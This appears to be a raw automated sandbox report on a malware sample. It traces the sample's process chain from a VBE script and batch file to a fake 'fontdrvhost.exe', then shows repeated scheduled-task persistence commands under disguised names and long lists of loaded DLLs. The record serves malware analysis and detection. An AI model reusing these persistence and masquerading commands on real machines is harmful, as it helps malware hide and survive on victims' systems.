Source: C:\Drivers\fontdrvhost.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Drivers\fontdrvhost.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Drivers\fontdrvhost.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Drivers\fontdrvhost.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Drivers\fontdrvhost.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Drivers\fontdrvhost.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Drivers\fontdrvhost.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Drivers\fontdrvhost.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Drivers\fontdrvhost.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Drivers\fontdrvhost.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Drivers\fontdrvhost.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Drivers\fontdrvhost.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Drivers\fontdrvhost.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Drivers\fontdrvhost.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Drivers\fontdrvhost.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Drivers\fontdrvhost.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Drivers\fontdrvhost.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create

Source: C:\Users\user\Desktop\YGk3y6Tdix.exe

File read: C:\Windows\win.ini

Jump to behavior

Source: C:\Users\user\Desktop\YGk3y6Tdix.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: BPOjh9hPL9.26.dr, tApNpX5ile.26.dr

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: YGk3y6Tdix.exe	Virustotal: Detection: 59%
Source: YGk3y6Tdix.exe	ReversingLabs: Detection: 63%

Source: C:\Users\user\Desktop\YGk3y6Tdix.exe

File read: C:\Users\user\Desktop\YGk3y6Tdix.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\YGk3y6Tdix.exe "C:\Users\user\Desktop\YGk3y6Tdix.exe"
Source: C:\Users\user\Desktop\YGk3y6Tdix.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Drivers\6RHoR6LVzzezwu6iEjrLxYdAHRXCcmMIlUFOAkT.vbe"
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Drivers\QSdmXzK8rClLDrHgb.bat" "
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Drivers\fontdrvhost.exe "C:\/Drivers/fontdrvhost.exe"
Source: C:\Drivers\fontdrvhost.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "servicess" /sc MINUTE /mo 12 /tr "'C:\Program Files\Internet Explorer\SIGNUP\services.exe'" /f
Source: C:\Drivers\fontdrvhost.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "services" /sc ONLOGON /tr "'C:\Program Files\Internet Explorer\SIGNUP\services.exe'" /rl HIGHEST /f
Source: C:\Drivers\fontdrvhost.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "servicess" /sc MINUTE /mo 5 /tr "'C:\Program Files\Internet Explorer\SIGNUP\services.exe'" /rl HIGHEST /f
Source: C:\Drivers\fontdrvhost.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "FDhouUKjYnvlBIdtOklvQSsmeAjQF" /sc MINUTE /mo 12 /tr "'C:\Drivers\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe'" /f
Source: C:\Drivers\fontdrvhost.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "FDhouUKjYnvlBIdtOklvQSsmeAjQ" /sc ONLOGON /tr "'C:\Drivers\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe'" /rl HIGHEST /f
Source: C:\Drivers\fontdrvhost.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "FDhouUKjYnvlBIdtOklvQSsmeAjQF" /sc MINUTE /mo 11 /tr "'C:\Drivers\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe'" /rl HIGHEST /f
Source: C:\Drivers\fontdrvhost.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "FDhouUKjYnvlBIdtOklvQSsmeAjQF" /sc MINUTE /mo 13 /tr "'C:\Users\Default User\AppData\Local\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe'" /f
Source: C:\Drivers\fontdrvhost.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "FDhouUKjYnvlBIdtOklvQSsmeAjQ" /sc ONLOGON /tr "'C:\Users\Default User\AppData\Local\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe'" /rl HIGHEST /f
Source: C:\Drivers\fontdrvhost.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "FDhouUKjYnvlBIdtOklvQSsmeAjQF" /sc MINUTE /mo 7 /tr "'C:\Users\Default User\AppData\Local\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe'" /rl HIGHEST /f
Source: C:\Drivers\fontdrvhost.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "FDhouUKjYnvlBIdtOklvQSsmeAjQF" /sc MINUTE /mo 11 /tr "'C:\Windows\Downloaded Program Files\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe'" /f
Source: C:\Drivers\fontdrvhost.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "FDhouUKjYnvlBIdtOklvQSsmeAjQ" /sc ONLOGON /tr "'C:\Windows\Downloaded Program Files\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe'" /rl HIGHEST /f
Source: C:\Drivers\fontdrvhost.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "FDhouUKjYnvlBIdtOklvQSsmeAjQF" /sc MINUTE /mo 6 /tr "'C:\Windows\Downloaded Program Files\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe'" /rl HIGHEST /f
Source: C:\Drivers\fontdrvhost.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "FDhouUKjYnvlBIdtOklvQSsmeAjQF" /sc MINUTE /mo 11 /tr "'C:\Recovery\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe'" /f
Source: C:\Drivers\fontdrvhost.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "FDhouUKjYnvlBIdtOklvQSsmeAjQ" /sc ONLOGON /tr "'C:\Recovery\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe'" /rl HIGHEST /f
Source: C:\Drivers\fontdrvhost.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "FDhouUKjYnvlBIdtOklvQSsmeAjQF" /sc MINUTE /mo 11 /tr "'C:\Recovery\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe'" /rl HIGHEST /f
Source: C:\Drivers\fontdrvhost.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 8 /tr "'C:\Drivers\fontdrvhost.exe'" /f
Source: C:\Drivers\fontdrvhost.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "fontdrvhost" /sc ONLOGON /tr "'C:\Drivers\fontdrvhost.exe'" /rl HIGHEST /f
Source: C:\Drivers\fontdrvhost.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 5 /tr "'C:\Drivers\fontdrvhost.exe'" /rl HIGHEST /f
Source: unknown	Process created: C:\Recovery\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe C:\Recovery\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe
Source: unknown	Process created: C:\Recovery\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe C:\Recovery\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe
Source: unknown	Process created: C:\Drivers\fontdrvhost.exe C:\Drivers\fontdrvhost.exe
Source: unknown	Process created: C:\Drivers\fontdrvhost.exe C:\Drivers\fontdrvhost.exe
Source: C:\Drivers\fontdrvhost.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\lscqkorEZ8.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\Downloaded Program Files\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe "C:\Windows\Downloaded Program Files\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe"
Source: C:\Users\user\Desktop\YGk3y6Tdix.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Drivers\6RHoR6LVzzezwu6iEjrLxYdAHRXCcmMIlUFOAkT.vbe"	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Drivers\QSdmXzK8rClLDrHgb.bat" "	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Drivers\fontdrvhost.exe "C:\/Drivers/fontdrvhost.exe"	Jump to behavior
Source: C:\Drivers\fontdrvhost.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\lscqkorEZ8.bat"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\Downloaded Program Files\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe "C:\Windows\Downloaded Program Files\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe"

Source: C:\Users\user\Desktop\YGk3y6Tdix.exe	Section loaded: <pi-ms-win-core-synch-l1-2-0.dll	Jump to behavior
Source: C:\Users\user\Desktop\YGk3y6Tdix.exe	Section loaded: <pi-ms-win-core-fibers-l1-1-1.dll	Jump to behavior
Source: C:\Users\user\Desktop\YGk3y6Tdix.exe	Section loaded: <pi-ms-win-core-synch-l1-2-0.dll	Jump to behavior
Source: C:\Users\user\Desktop\YGk3y6Tdix.exe	Section loaded: <pi-ms-win-core-fibers-l1-1-1.dll	Jump to behavior
Source: C:\Users\user\Desktop\YGk3y6Tdix.exe	Section loaded: <pi-ms-win-core-localization-l1-2-1.dll	Jump to behavior
Source: C:\Users\user\Desktop\YGk3y6Tdix.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\YGk3y6Tdix.exe	Section loaded: dxgidebug.dll	Jump to behavior
Source: C:\Users\user\Desktop\YGk3y6Tdix.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Users\user\Desktop\YGk3y6Tdix.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\YGk3y6Tdix.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\YGk3y6Tdix.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\YGk3y6Tdix.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\YGk3y6Tdix.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\YGk3y6Tdix.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\Desktop\YGk3y6Tdix.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\Desktop\YGk3y6Tdix.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\Desktop\YGk3y6Tdix.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\YGk3y6Tdix.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\YGk3y6Tdix.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\YGk3y6Tdix.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\YGk3y6Tdix.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\YGk3y6Tdix.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\YGk3y6Tdix.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\YGk3y6Tdix.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\YGk3y6Tdix.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\YGk3y6Tdix.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\YGk3y6Tdix.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\YGk3y6Tdix.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\YGk3y6Tdix.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\YGk3y6Tdix.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\YGk3y6Tdix.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\YGk3y6Tdix.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\YGk3y6Tdix.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\YGk3y6Tdix.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\YGk3y6Tdix.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\YGk3y6Tdix.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\YGk3y6Tdix.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Users\user\Desktop\YGk3y6Tdix.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Users\user\Desktop\YGk3y6Tdix.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\YGk3y6Tdix.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\YGk3y6Tdix.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\YGk3y6Tdix.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\YGk3y6Tdix.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\YGk3y6Tdix.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\YGk3y6Tdix.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\YGk3y6Tdix.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Users\user\Desktop\YGk3y6Tdix.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: scrobj.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: dlnashext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wpdshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Drivers\fontdrvhost.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Drivers\fontdrvhost.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Drivers\fontdrvhost.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Drivers\fontdrvhost.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Drivers\fontdrvhost.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Drivers\fontdrvhost.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Drivers\fontdrvhost.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Drivers\fontdrvhost.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Drivers\fontdrvhost.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Drivers\fontdrvhost.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Drivers\fontdrvhost.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Drivers\fontdrvhost.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Drivers\fontdrvhost.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Drivers\fontdrvhost.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Drivers\fontdrvhost.exe	Section loaded: ktmw32.dll	Jump to behavior
Source: C:\Drivers\fontdrvhost.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Drivers\fontdrvhost.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Drivers\fontdrvhost.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Drivers\fontdrvhost.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Drivers\fontdrvhost.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Drivers\fontdrvhost.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Drivers\fontdrvhost.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Drivers\fontdrvhost.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Drivers\fontdrvhost.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Drivers\fontdrvhost.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Drivers\fontdrvhost.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Drivers\fontdrvhost.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Drivers\fontdrvhost.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Drivers\fontdrvhost.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Drivers\fontdrvhost.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Drivers\fontdrvhost.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Drivers\fontdrvhost.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Drivers\fontdrvhost.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Drivers\fontdrvhost.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Drivers\fontdrvhost.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Drivers\fontdrvhost.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Drivers\fontdrvhost.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Drivers\fontdrvhost.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Drivers\fontdrvhost.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Drivers\fontdrvhost.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Drivers\fontdrvhost.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Drivers\fontdrvhost.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Drivers\fontdrvhost.exe	Section loaded: dlnashext.dll	Jump to behavior
Source: C:\Drivers\fontdrvhost.exe	Section loaded: wpdshext.dll	Jump to behavior
Source: C:\Drivers\fontdrvhost.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Drivers\fontdrvhost.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Drivers\fontdrvhost.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Drivers\fontdrvhost.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Drivers\fontdrvhost.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Drivers\fontdrvhost.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Drivers\fontdrvhost.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Drivers\fontdrvhost.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Drivers\fontdrvhost.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Drivers\fontdrvhost.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Drivers\fontdrvhost.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Drivers\fontdrvhost.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Drivers\fontdrvhost.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
